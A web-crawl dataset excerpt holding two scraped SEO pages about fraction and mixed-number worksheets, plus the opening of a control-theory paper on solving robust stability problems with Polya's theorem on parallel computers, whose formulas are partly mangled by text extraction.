URL: stringlengths 15 to 1.68k
text_list: sequencelengths 1 to 199
image_list: sequencelengths 1 to 199
metadata: stringlengths 1.19k to 3.08k
https://winegeeknyc.netlify.app/limited-adding-mixed-numbers-worksheet/
[ "# 47+ Limited adding mixed numbers worksheet Most Effective\n\nWritten by Wayne Jan 26, 2021 · 8 min read", null, "Your Limited adding mixed numbers worksheet images are available. Limited adding mixed numbers worksheet are a topic that is being searched for and liked by netizens today. You can Find and Download the Limited adding mixed numbers worksheet files here. Get all free photos and vectors.\n\nIf you’re searching for limited adding mixed numbers worksheet pictures information linked to the limited adding mixed numbers worksheet interest, you have pay a visit to the right site. Our site frequently gives you hints for seeking the highest quality video and picture content, please kindly hunt and locate more enlightening video content and graphics that match your interests.\n\nLimited Adding Mixed Numbers Worksheet. The first is on addition the second is on subtraction and the third is on both operations. Great for a class review or homework activity. Adding mixed numbers with like denominators Below are six versions of our grade 4 fractions worksheet on adding mixed numbers which have the same denominators. 22022018 Adding and subtracting fractions including mixed numbers homework sheet with answers.", null, "Adding Mixed Fraction Worksheet Promotiontablecovers From promotiontablecovers.blogspot.com\n\nIf the denominators are different then you must first find equivalent fractions with a. Mixed numbers are made up of one integer and one proper fraction or in simpler words a whole number and a fraction. There are also links to fraction and mixed number addition subtraction multiplication and division. How do you add mixed numbers. Nov 27 2015 - Reinforce common core skills with this fractions worksheet. Adding mixed numbers with like denominators Below are six versions of our grade 4 fractions worksheet on adding mixed numbers which have the same denominators.\n\n### Mixed Numbers Add fractions with same and different denominators.\n\nStudents practice adding and subtraction mixed number in the 14 question worksheet. Some of the worksheets displayed are Grade 5 fractions work Fractions work converting mixed fractions to Convert between mixed fraction and improper fraction 1 Improper and mixed fractions Grade 5 fractions work Rename mixed to fractions with circles name complete Improper fractions mixed numbers Fractions work converting between mixed. Fractions - Practice converting improper fractions to mixed numbers. Ideal for grade 4 grade 5 and grade 6 these pdf worksheets abound in exercises on subtracting mixed numbers with like and unlike denominators subtracting fractions from mixed numbers and finding the missing mixed number in a. AddingMixed Numbers Other contents. Add up the whole-number and fractional parts separately for the sum.", null, "Source: greatschools.org\n\nMixed numbers are made up of one integer and one proper fraction or in simpler words a whole number and a fraction. Mixed Numbers Add fractions with same and different denominators. In this sixth grade fraction worksheet students are required to find the sum of mixed and whole numbers for each problem of this worksheet. Based on the colors written in each problem box students color the lettered grid. This page has worksheets for teaching basic fraction skills equivalent fractions simplifying fractions and ordering fractions.", null, "Source: homeschoolmath.net\n\n16112019 A collection of three worksheets on adding and subtracting mixed numbers. 
Adding mixed numbers with like denominators Below are six versions of our grade 4 fractions worksheet on adding mixed numbers which have the same denominators. In this sixth grade fraction worksheet students are required to find the difference between mixed and whole numbers for each problem of this worksheet. Our Adding and Subtracting Fractions and Mixed Numbers worksheets are designed to supplement our Adding and Subtracting Fractions and Mixed Numbers lessons. Adding Mixed Numbers Answer Key Showing top 8 worksheets in the category - Adding Mixed Numbers Answer Key.", null, "Source: pinterest.com\n\nConvert the mixed number to its equivalent irregular fraction convert the whole number to its equivalent fraction form find the LCM or LCD of denominators multiply the LCD with both numerator and denominator of each fractions simplify. This page has worksheets for teaching basic fraction skills equivalent fractions simplifying fractions and ordering fractions. Make headway in subtracting two mixed numbers and finding their difference with this collection of printable mixed number subtraction worksheets. Students practice adding and subtraction mixed number in the 14 question worksheet. There are also links to fraction and mixed number addition subtraction multiplication and division.", null, "Source: pinterest.com\n\n22022018 Adding and subtracting fractions including mixed numbers homework sheet with answers. Adding mixed numbers unlike denominators Below are six versions of our grade 5 math worksheet on adding mixed numbers where the fractional parts of the numbers have different denominators. These ready-to-use printable worksheets help assess student learning. Detailed solutions are included. Some of the worksheets displayed are Grade 5 fractions work Fractions work converting mixed fractions to Convert between mixed fraction and improper fraction 1 Improper and mixed fractions Grade 5 fractions work Rename mixed to fractions with circles name complete Improper fractions mixed numbers Fractions work converting between mixed.", null, "Source: pinterest.com\n\nAfter solving each problem students find corresponding answers in the answer table. This level 1 worksheet asks students to add the fractions and write their answer as a mixed fraction where necessary. There are 7 addition and 7 subtraction problems and includes and answer key. The arithmetic in these questions is kept simple and students can try to formulate the answers mentally without writing down calculations. AddingMixed Numbers Other contents.", null, "Source: promotiontablecovers.blogspot.com\n\nMixed Numbers Add fractions with same and different denominators. In this sixth grade fraction worksheet students are required to find the sum of mixed and whole numbers for each problem of this worksheet. Nov 27 2015 - Reinforce common core skills with this fractions worksheet. 16112019 A collection of three worksheets on adding and subtracting mixed numbers. Based on the colors written in each problem box students color the lettered grid.", null, "Source: greatschools.org\n\nIf the denominators are different then you must first find equivalent fractions with a. Students practice adding and subtraction mixed number in the 14 question worksheet. This level 1 worksheet asks students to add the fractions and write their answer as a mixed fraction where necessary. You can add mixed numbers by first adding the whole numbers together and then the fractions. 
AddingMixed Numbers Other contents.", null, "Source: greatschools.org\n\nThere are two different ways which you can use when adding mixed numbers. This work is. Our Adding and Subtracting Fractions and Mixed Numbers worksheets are designed to supplement our Adding and Subtracting Fractions and Mixed Numbers lessons. AddingMixed Numbers Other contents. Detailed solutions are included.", null, "Source: greatschools.org\n\nMissing numbers - This worksheet helps children find the value of n. This page has worksheets for teaching basic fraction skills equivalent fractions simplifying fractions and ordering fractions. Showing top 8 worksheets in the category - Converting Mixed Number. The first is on addition the second is on subtraction and the third is on both operations. These math worksheets are pdf files.", null, "Source: pinterest.com\n\nNov 27 2015 - Reinforce common core skills with this fractions worksheet. There are 7 addition and 7 subtraction problems and includes and answer key. Convert the mixed number to its equivalent irregular fraction convert the whole number to its equivalent fraction form find the LCM or LCD of denominators multiply the LCD with both numerator and denominator of each fractions simplify. The arithmetic in these questions is kept simple and students can try to formulate the answers mentally without writing down calculations. There are two different ways which you can use when adding mixed numbers.", null, "Source: homeschoolmath.net\n\nAdding mixed numbers with like denominators Below are six versions of our grade 4 fractions worksheet on adding mixed numbers which have the same denominators. This worksheet includes 12 problems involving adding and subtracting mixed numbers. Extra licenses are 075Questio. Mixed numbers are made up of one integer and one proper fraction or in simpler words a whole number and a fraction. Add up the whole-number and fractional parts separately for the sum.", null, "Source: math-salamanders.com\n\nSheet includes practice AQA multiple choice. There are two different ways which you can use when adding mixed numbers. In this sixth grade fraction worksheet students are required to find the difference between mixed and whole numbers for each problem of this worksheet. This worksheet includes 12 problems involving adding and subtracting mixed numbers. Extra licenses are 075Questio.", null, "Source: homeschoolmath.net\n\nStudents practice adding and subtraction mixed number in the 14 question worksheet. This level 1 worksheet asks students to add the fractions and write their answer as a mixed fraction where necessary. Worksheet 1 Worksheet 2 Worksheet 3 Worksheet 4 Worksheet 5 Worksheet 6. Based on the colors written in each problem box students color the lettered grid. Great for a class review or homework activity.", null, "Source: pinterest.com\n\nSheet includes practice AQA multiple choice. Detailed solutions are included. Extra licenses are 075Questio. These math worksheets are pdf files. This page has worksheets for teaching basic fraction skills equivalent fractions simplifying fractions and ordering fractions.", null, "Source: math-salamanders.com\n\nThese math worksheets are pdf files. This level 1 worksheet asks students to add the fractions and write their answer as a mixed fraction where necessary. Missing numbers - This worksheet helps children find the value of n. Mixed numbers are made up of one integer and one proper fraction or in simpler words a whole number and a fraction. 
In this sixth grade fraction worksheet students are required to find the difference between mixed and whole numbers for each problem of this worksheet.\n\nThis site is an open community for users to share their favorite wallpapers on the internet, all images or pictures in this website are for personal wallpaper use only, it is stricly prohibited to use this wallpaper for commercial purposes, if you are the author and find this image is shared without your permission, please kindly raise a DMCA report to Us.\n\nIf you find this site value, please support us by sharing this posts to your favorite social media accounts like Facebook, Instagram and so on or you can also save this blog page with the title limited adding mixed numbers worksheet by using Ctrl + D for devices a laptop with a Windows operating system or Command + D for laptops with an Apple operating system. If you use a smartphone, you can also use the drawer menu of the browser you are using. Whether it’s a Windows, Mac, iOS or Android operating system, you will still be able to bookmark this website.", null, "## 33++ Percentage increase and decrease worksheet Useful\n\nJan 08 . 8 min read", null, "## 11+ Positive using equations to solve word problems worksheet information\n\nJun 16 . 10 min read", null, "## 16++ Fresh preschool science worksheets Useful\n\nMay 25 . 8 min read", null, "## 40+ Amusing super math worksheets Awesome\n\nJun 05 . 6 min read", null, "## 30+ Printable spelling worksheets Useful\n\nFeb 17 . 9 min read", null, "## 17+ Extraordinay touch points math worksheets Latest News\n\nApr 25 . 6 min read" ]
[ null, "https://www.math-salamanders.com/image-files/adding-fractions-worksheets-5.gif", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null, "https://winegeeknyc.netlify.app/img/placeholder.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8993812,"math_prob":0.8505008,"size":11213,"snap":"2021-43-2021-49","text_gpt3_token_len":2035,"char_repetition_ratio":0.23124275,"word_repetition_ratio":0.55939144,"special_character_ratio":0.17649157,"punctuation_ratio":0.078849226,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9947054,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46],"im_url_duplicate_count":[null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-21T17:16:38Z\",\"WARC-Record-ID\":\"<urn:uuid:64dae0c2-176f-4247-9130-cf2fd307844d>\",\"Content-Length\":\"35291\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2f87a7c5-c54a-4c9a-b95d-8b48d0998bf8>\",\"WARC-Concurrent-To\":\"<urn:uuid:9d4be8aa-b5f7-4c49-b7f5-ae9465cd3f61>\",\"WARC-IP-Address\":\"161.35.60.200\",\"WARC-Target-URI\":\"https://winegeeknyc.netlify.app/limited-adding-mixed-numbers-worksheet/\",\"WARC-Payload-Digest\":\"sha1:GQGCCXYFQMVVJDNLOFFP5TV5R5RW5YDG\",\"WARC-Block-Digest\":\"sha1:22JFGYYI2EKM26HY6STJWIBGYG7EUFQR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585439.59_warc_CC-MAIN-20211021164535-20211021194535-00317.warc.gz\"}"}
http://tagn.info/high-school-fractions-worksheets/detailed-lesson-plan-rational-equation-grand-i-objectives-at-the-end-of-the-lesson-students-should-be-able-to-a-high-school-math-review-worksheets-pdf/
[ "", null, "detailed lesson plan rational equation grand i objectives at the end of the lesson students should be able to a high school math review worksheets pdf.\n\nhigh school level fraction worksheets secondary fractions review worksheet pin by on maths math and,secondary school fractions worksheets high level fraction practice inspirational worksheet images,free high school fractions worksheets division of multiplying and dividing worksheet math review pdf fraction practice,high school fraction practice worksheets kids identify the worksheet fractions review secondary,high school fraction review worksheet printable math worksheets practice pdf,high school math review worksheets printable fraction practice worksheet,secondary school fractions worksheets free high math review simplifying worksheet kids apps reading writing,high school fraction practice worksheets free fractions printable math review pdf,high school level fraction worksheets geometry math worksheet photos of free fractions review,multiplication and division worksheets high free school fractions math review fraction practice." ]
[ null, "http://tagn.info/wp-content/uploads/2018/11/detailed-lesson-plan-rational-equation-grand-i-objectives-at-the-end-of-the-lesson-students-should-be-able-to-a-high-school-math-review-worksheets-pdf.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.79803926,"math_prob":0.60078543,"size":1095,"snap":"2019-26-2019-30","text_gpt3_token_len":163,"char_repetition_ratio":0.28780934,"word_repetition_ratio":0.0,"special_character_ratio":0.1369863,"punctuation_ratio":0.06875,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9967438,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-15T21:54:08Z\",\"WARC-Record-ID\":\"<urn:uuid:05dcfa2c-d991-4be4-bdbf-6d83c90fe787>\",\"Content-Length\":\"52912\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ab064742-b9cc-4d2a-9cd1-03b3ef87d4de>\",\"WARC-Concurrent-To\":\"<urn:uuid:81df0ba6-4e95-4a69-ac44-3969f3f1702b>\",\"WARC-IP-Address\":\"104.31.78.209\",\"WARC-Target-URI\":\"http://tagn.info/high-school-fractions-worksheets/detailed-lesson-plan-rational-equation-grand-i-objectives-at-the-end-of-the-lesson-students-should-be-able-to-a-high-school-math-review-worksheets-pdf/\",\"WARC-Payload-Digest\":\"sha1:YFG7JD6OEU2TZXWUDVEO4GKWI3Z4Z7U3\",\"WARC-Block-Digest\":\"sha1:U6XD6DCI7F2NB6SKYPLCL3YQLULVWRPY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195524254.28_warc_CC-MAIN-20190715215144-20190716001144-00314.warc.gz\"}"}
https://www.groundai.com/project/solving-large-scale-robust-stability-problems-by-exploiting-the-parallel-structure-of-polyas-theorem/
[ "Solving Large-Scale Robust Stability Problems by Exploiting the Parallel Structure of Polya’s Theorem\n\n# Solving Large-Scale Robust Stability Problems by Exploiting the Parallel Structure of Polya’s Theorem\n\n## Abstract\n\nIn this paper, we propose a distributed computing approach to solving large-scale robust stability problems on the simplex. Our approach is to formulate the robust stability problem as an optimization problem with polynomial variables and polynomial inequality constraints. We use Polya’s theorem to convert the polynomial optimization problem to a set of highly structured Linear Matrix Inequalities (LMIs). We then use a slight modification of a common interior-point primal-dual algorithm to solve the structured LMI constraints. This yields a set of extremely large yet structured computations. We then map the structure of the computations to a decentralized computing environment consisting of independent processing nodes with a structured adjacency matrix. The result is an algorithm which can solve the robust stability problem with the same per-core complexity as the deterministic stability problem with a conservatism which is only a function of the number of processors available. Numerical tests on cluster computers and supercomputers demonstrate the ability of the algorithm to efficiently utilize hundreds and potentially thousands of processors and analyze systems with 100+ dimensional state-space. The proposed algorithms can be extended to perform stability analysis of nonlinear systems and robust controller synthesis.\n\nRobust stability, Polynomial optimization, Large-scale systems, Decentralized computing\n\n## I Introduction\n\nThis paper addresses the problem of stability of large-scale systems with several unknown parameters. Control system theory when applied in practical situations often involves the use of large state-space models, typically due to inherent complexity of the system, the interconnection of subsystems, or the reduction of an infinite-dimensional or PDE model to a finite-dimensional approximation. One approach to dealing with such large scale models has been to use model reduction techniques such as balanced truncation . However, the use of model reduction techniques are not necessarily robust and can result in arbitrarily large errors. In addition to large state-space, practical problems often contain uncertainty in the model due to modeling errors, linearization, or fluctuation in the operating conditions. The problem of stability and control of systems with uncertainty has been widely studied. See, e.g. the texts [2, 3, 4, 5]. However, a limitation of existing computational methods for analysis and control of systems with uncertainty is high complexity. This is a consequence of fact that the problem of robust stability of systems with parametric uncertainty is known to be NP-hard [6, 7]. The result is that for systems with parametric uncertainty and with hundreds of states, existing algorithms will fail with the primary point of failure usually being lack of unallocated memory.\n\nIn this paper, we seek to distribute the computation laterally over an array of processors within the context of existing computational resources. Specifically, we seek to utilize cluster-computing, supercomputing and Graphics Processing Unit (GPU)-computing architectures. 
When designing algorithms to run in a parallel computing environment, one must both synchronize computational tasks among the processors while minimizing communication overhead among the processors. This can be difficult, as each architecture has a specific communication graph. we account for communication by explicitly modeling the required communication graph between processors. This communication graph is then mapped to the processor architecture using the Message-Passing Interface (MPI) . While there are many algorithms for robust stability analysis and control of linear systems, ours is the first which explicitly accounts for the processing architecture in the emerging multi-core computing environment.\n\nOur approach to robust stability is based on the well-established use of parameter-dependent Quadratic-In-The-State (QITS) Lyapunov functions. The use of parameter-dependent Lyapunov QITS functions eliminates the conservativity associated with e.g. quadratic stability , at the cost of requiring some restriction on the rate of parameter variation. Specifically, our QITS Lyapunov variables are polynomials in the vector of uncertain parameters. This is a generalization of the use of QITS Lyapunov functions with affine parameter dependence as in  and expanded in, e.g. [11, 12, 13, 14]. The use of polynomial QITS Lyapunov variables can be motivated by , wherein it is shown that any feasible parameter-dependent LMI with parameters inside a compact set has a polynomial solution or  wherein it is shown that local stability of a nonlinear vector field implies the existence of a polynomial Lyapunov function.\n\nThere are several results which use polynomial QITS Lyapunov functions to prove robust stability. In most cases, the stability problem is reduced to the general problem of optimization of polynomial variables subject to LMI constraints - an NP-hard problem . To avoid NP-hardness, the polynomial optimization problem is usually solved in an asymptotic manner by posing a sequence of sufficient conditions of increasing accuracy and decreasing conservatism. For example, building on the result in  provides a sequence of increasingly precise LMI conditions for robust stability analysis of linear systems with affine dependency on uncertain parameters on the complex unit ball. Necessary and sufficient stability conditions for linear systems with one uncertain parameter are derived in , providing an explicit bound on the degree of the polynomial-type Lyapunov function. The result is extended to multi-parameter-dependent linear systems in . Another important approach to optimization of polynomials is the Sum of Squares (SOS) methodology which replaces the polynomial positivity constraint with the constraint that the polynomial admits a representation as a sum of squares of polynomials [21, 22, 23, 24]. A version of this theorem for polynomials with matrix coefficients can be found in . While we have worked extensively with the SOS methodology, we have not, as of yet, been able to adapt algorithms for solving the resulting LMI conditions to a parallel-computing environment. Finally, there have been several results in recent years on the use of Polya’s theorem to solve polynomial optimization problems  on the simplex. An extension of the Polya’s theorem for uncertain parameters on the multisimplex or hypercube can be found in . 
The approach presented in this paper is an extension of the use of Polya’s theorem for solving polynomial optimization problems in a parallel computing environment.\n\nThe goal of this project is to create algorithms which explicitly map computation, communication and storage to existing parallel processing architectures. This goal is motivated by the failure of existing general-purpose Semi-Definite Programming (SDP) solvers to efficiently utilize platforms for large-scale computation. Specifically, it is well-established that linear programming and semi-definite programming both belong to the complexity class P-Complete, also known as the class of inherently sequential problems. Although there have been several attempts to map certain SDP solvers to a parallel computing environment [27, 28], certain critical steps cannot be distributed. The result is that as the number of processors increases, certain bottleneck computations dominate, leading to a saturation in computational speed of these solvers (Amdahl’s law). We avoid these bottleneck computations and communications by exploiting the particular structure of the LMI conditions associated with Polya’s theorem. Note that, in principle, a perfectly designed general-purpose SDP algorithm could identify the structure of the SDP, as we have, and map the communication, computation and memory constraints to the parallel architecture. Indeed, there has been a great deal of research on creating programming languages which attempt to do just this [30, 31]. However, at present such languages are mostly theoretical and have certainly not been incorporated into existing SDP solvers.\n\nIn addition to parallel SDP solvers, there have been some efforts to exploit structure in certain polynomial optimization algorithms to reduce the size and complexity of the resulting LMIs. For example, in  symmetry was used to reduce the size of the SDP variables. Specific sparsity structure was used in [33, 34, 35] to reduce the complexity of the linear algebra calculations. Generalized approaches to the use of sparsity in SDP algorithms can be found in . Groebner basis techniques [36, 37] have been used by  to simplify the formulation of the SDPs associated with the SOS decomposition problems.\n\nThe paper is organized around two independent problems: setting up the sequence of structured SDPs associated with Polya’s theorem and solving them. Note that the problem of decentralizing the set-up algorithm is significant in that for large-scale systems, the instantiation of the problem may be beyond the memory and computational capacity of a single processing node. For the set-up problem, the algorithm that we propose has no centralized memory or computational requirements whatsoever. Furthermore, if a sufficient number of processors are available, the number of messages does not change with the size of the state-space or the number of Polya’s iterations. In addition, the ideal communication architecture for the set-up algorithm does not correspond to the communication structure of GPU computing or supercomputing. In the second problem, we propose a variant of a standard SDP primal-dual algorithm and map the computational, memory and communication requirements to a parallel computing environment. Unlike the set-up algorithm, the primal-dual algorithm does have a small centralized component corresponding to the update of the set of dual variables. 
However, we have structured the algorithm so that the size of this dual computation is solely a function of the degree of the polynomial QITS Lyapunov function and does not depend on the number of Polya’s iterations, meaning that the sequence of algorithms has fixed centralized computational and communication complexity. In addition, there is no communication between processors, which means that the algorithm is well suited to most parallel computing architectures. A graph representation of the communication architecture of both the set-up and SDP algorithms has also been provided in the relevant sections.\n\nCombining the set-up and SDP components and testing the result of both in cluster computing environments, we demonstrate the capability of robust analysis and control of systems with 100+ states and several uncertain parameters. Specifically, we ran a series of numerical experiments using a local Linux cluster and the Blue Gene supercomputer (with 200 processor allocation). First, we applied the algorithm to a current problem in robust stability analysis of magnetic confinement fusion using a discretized PDE model. Next, we examine the accuracy of the algorithm as Polya’s iterations progress and compare this accuracy with the SOS approach. We show that unlike the general-purpose parallel SDP solver SDPARA , the speed-up - the increase in processing speed per additional processor - of our algorithm shows no evidence of saturation. Finally, we calculate the envelope of the algorithm on the Linux cluster in terms of the maximum state-space dimension, number of processors and Polya’s iterations.\n\nNOTATION\n\nWe represent variate monomials as , where is the vector of variables and is the vector of exponents and is the degree of the monomial. We define as the totally ordered set of the exponents of variate monomials of degree , where the ordering is lexicographic. In lexicographical ordering precedes , if the left most non-zero entry of is positive. The lexicographical index of every can be calculated using the map defined as \n\n ⟨γ⟩=l−1∑j=1γi∑i=1f\\bbl(l−j,d+1−j−1∑k=1γk−i\\bbr)+1, (1)\n\nwhere as in \n\n f(l,d):=⎧⎪⎨⎪⎩0forl=0(l+d−1l−1)=(d+l−1)!d!(l−1)!forl>0, (2)\n\nis the cardinality of , i.e., the number of variate monomials of degree . For convenience, we also define the index of a monomial to be . We represent variate homogeneous polynomials of degree as\n\n P(α)=∑γ∈WdpP⟨γ⟩αγ, (3)\n\nwhere is the matrix coefficient of the monomial . We denote the element corresponding to the row and column of matrix as . The subspace of symmetric matrices in is denoted by . We define a basis for as\n\n [Ek]i,j:={1if i=j=k0otherwise,fork≤nand\n [Ek]i,j:=[Fk]i,j+[Fk]Ti,j,fork>n, (4)\n\nwhere\n\n [Fk]i,j:={1if i=j−1=k−n0otherwise. (5)\n\nNote that this choice of basis is arbitrary - any other basis could be used. However, any change in basis would require modifications to the formulae defined in this paper. The canonical basis for is denoted by for , where The vector with all entries equal to one is denoted by . The trace of is denoted by . The block-diagonal matrix with diagonal blocks is denoted or occasionally as . The identity and zero matrices are denoted by and .\n\n## Ii Preliminaries\n\nConsider the linear system\n\n ˙x(t)=A(α)x(t), (6)\n\nwhere and is a vector of uncertain parameters. In this paper, we consider the case where is a homogeneous polynomial and where is the unit simplex, i.e.,\n\n Δl={α∈Rl,l∑i=1αi=1,αi⩾0}. 
(7)\n\nIf is not homogeneous, we can obtain an equivalent homogeneous representation in the following manner. Suppose is a non-homogeneous polynomial with , is of degree and has monomials with non-zero coefficients. Define , where is the degree of the monomial of according to lexicographical ordering. Now define the polynomial as per the following.\n\n1. Let .\n\n2. For , multiply the monomial of , according to lexicographical ordering, by .\n\nThen, since , for all and hence all properties of are retained by the homogeneous system .\n\n1) Example: Construction of the homogeneous system .\n\nConsider the non-homogeneous polynomial of degree , where . Using the above procedure, the homogeneous polynomial can be constructed as\n\n B(α)=Cα21+Dα2(α1+α2+α3)+Eα3(α1+α2+α3) +F(α1+α2+α3)2=(C+FB1)α21+(D+2F)B2α1α2 +(E+2F)B3α1α3+(D+F)B4α22+(D+E+2F)B5α2α3 +(E+F)B6α23=∑γ∈W2B⟨γ⟩αγ. (8)\n\nThe following is a stability condition  for System (6). {thm} System (6) is stable if and only if there exists a polynomial matrix such that and\n\n AT(α)P(α)+P(α)A(α)≺0 (9)\n\nfor all . A similar condition also holds for discrete-time linear systems. The conditions associated with Theorem II are infinite-dimensional LMIs, meaning they must hold at infinite number of points. Such problems are known to be NP-hard . In this paper we derive a sequence of polynomial-time algorithms such that their outputs converge to the solution of the infinite-dimensional LMI. Key to this result is Polya’s Theorem . A variation of this theorem for matrices is given as follows.\n\n{thm}\n\n(Polya’s Theorem) The homogeneous polynomial for all if and only if for all sufficiently large ,\n\n (l∑i=1αi)dF(α) (10)\n\nhas all positive definite coefficients.\n\nUpper bounds for Polya’s exponent can be found as in . However, these bounds are based on the properties of and are difficult to determine a priori. In this paper, we show that applying Polya’s Theorem to the robust stability problem, i.e., the inequalities in Theorem II yields a semi-definite programming condition with an efficiently distributable structure. This is discussed in the following section.\n\n## Iii Problem Set-Up\n\nIn this section, we show how Polya’s theorem can be used to determine the robust stability of an uncertain system using linear matrix inequalities with a distributable structure.\n\n### Iii-a Polya’s Algorithm\n\nWe consider the stability of the system described by Equation (6). We are interested in finding a which satisfies the conditions of Theorem II. According to Polya’s theorem, the constraints of Theorem II are satisfied if for some sufficiently large and , the polynomials\n\n (l∑i=1αi)d1P(α)and (11)\n −(l∑i=1αi)d2(AT(α)P(α)+P(α)A(α)) (12)\n\nhave all positive definite coefficients.\n\nLet be a homogeneous polynomial of degree which can be represented as\n\n P(α)=∑γ∈WdpP⟨γ⟩αγ, (13)\n\nwhere the coefficients and where we recall that is the set of the exponents of all -variate monomials of degree . Since is a homogeneous polynomial of degree , we can write it as\n\n A(α)=∑γ∈WdaA⟨γ⟩αγ, (14)\n\nwhere the coefficients . By substituting (13) and (14) into (11) and (12) and defining as the degree of , the conditions of Theorem II can be represented in the form\n\n ∑h∈Wdpβ⟨h⟩,⟨γ⟩P⟨h⟩≻0;γ∈Wdp+d1and (15)\n ∑h∈Wdp(HT⟨h⟩,⟨γ⟩P⟨h⟩+P⟨h⟩H⟨h⟩,⟨γ⟩)≺0;γ∈Wdpa+d2. 
(16)\n\nHere is defined to be the scalar coefficient which multiplies in the -th monomial of the homogeneous polynomial using the lexicographical ordering. Likewise is the term which left or right multiplies in the -th monomial of using the lexicographical ordering. For an intuitive explanation as to how these and terms are calculated, we consider a simple example. Precise formulae for these terms will follow the example.\n\n1) Example: Calculating the and coefficients.\n\nConsider and . By expanding Equation (11) for we have\n\n (α1+α2)P(α)=P1α21+(P1+P2)α1α2+P2α22. (17)\n\nThe terms are then extracted as\n\n β1,1=1,β2,1=0,β1,2=1,β2,2=1,β1,3=0,β2,3=1. (18)\n\nNext, by expanding Equation (12) for we have\n\n (α1+α2)(AT(α)P(α)+P(α)A(α))=(AT1P1+P1A1)α31 +(AT1P1+P1A1+AT2P1+P1A2+AT1P2+P2A1)α21α2 +(AT2P1+P1A2+AT1P2+P2A1+AT2P2+P2A2)α1α22 +(AT2P2+P2A2)α32. (19)\n\nThe terms are then extracted as\n\n H1,1=A1, H2,1=0, H1,2=A1+A2, H2,2=A1, H1,3=A2, H2,3=A1+A2, H1,4=0, H2,4=A2. (20)\n\n2) General Formula: The can be formally defined recursively as follows. Let the initial values for be defined as\n\n β(0)⟨h⟩,⟨γ⟩={1if% h=γ0otherwiseforγ∈Wdpandh∈Wdp. (21)\n\nThen, iterating for , we let\n\n β(i)⟨h⟩,⟨γ⟩=∑λ∈W1β(i−1)⟨h⟩,⟨γ−λ⟩% forγ∈Wdp+iandh∈Wdp. (22)\n\nFinally, we set . To obtain , set the initial values as\n\n H(0)⟨h⟩,⟨γ⟩=∑λ∈Wda:λ+h=γA⟨λ⟩forγ∈Wdp+daandh∈Wdp. (23)\n\nThen, iterating for , we let\n\n H(i)⟨h⟩,⟨γ⟩=∑λ∈W1H(i−1)⟨h⟩,⟨γ−λ⟩forγ∈Wdpa+iandh∈Wdp. (24)\n\nFinally, set .", null, "Fig. 1: Number of β⟨h⟩,⟨γ⟩ and H⟨h⟩,⟨γ⟩ coefficients vs. the number of uncertain parameters for different Polya’s exponents and for dp=da=2\n\nFor the case of large-scale systems, computing and storing and is a significant challenge due to the number of these coefficients. Specifically, the number of terms increases with (number of uncertain parameters in system (6)), (degree of ), (degree of ) and (Polya’s exponents) as follows.\n\n3) Number of coefficients: For given and , since and , the number of coefficients is the product of and . Recall that card is the number of all -variate monomials of degree and can be calculated using (2) as follows.\n\n L0=f(l,dp)=⎧⎪⎨⎪⎩0forl=0(dp+l−1l−1)=(dp+l−1)!dp!(l−1)!forl>0. (25)\n\nLikewise, card, i.e., the number of all variate monomials of degree is calculated using (2) as follows.\n\n L=f(l,dp+d1)= ⎧⎪⎨⎪⎩0forl=0(dp+d1+l−1l−1)=(dp+d1+l−1)!(dp+d1)!(l−1)!forl>0. (26)\n\nThe number of coefficients is .\n\n4) Number of coefficients: For given and , since and , the number of coefficients is the product of and . By using (2), we have\n\n M=f(l,dpa+d2)= ⎧⎪⎨⎪⎩0forl=0(dpa+d2+l−1l−1)=(dpa+d2+l−1)!(dpa+d2)!(l−1)!forl>0. (27)\n\nThe number of coefficients is .\n\nThe number of and coefficients and the required memory to store these coefficients are shown in Figs. 1 and 2 in terms of the number of uncertain parameters and for different Polya’s exponents. In all cases .", null, "Fig. 2: Memory required to store β and H coefficients vs. number of uncertain parameters, for different d1,d2 and dp=da=2\n\nIt is observed from Fig. 2 that, even for small and , the required memory is in the Terabyte range. In , we proposed a decentralized computing approach to the calculation of on large cluster computers. In the present work, we extend this method to the calculation of and the SDP elements which will be discussed in the following section. We express the LMIs associated with conditions (15) and (16) as an SDP in both primal and dual forms. 
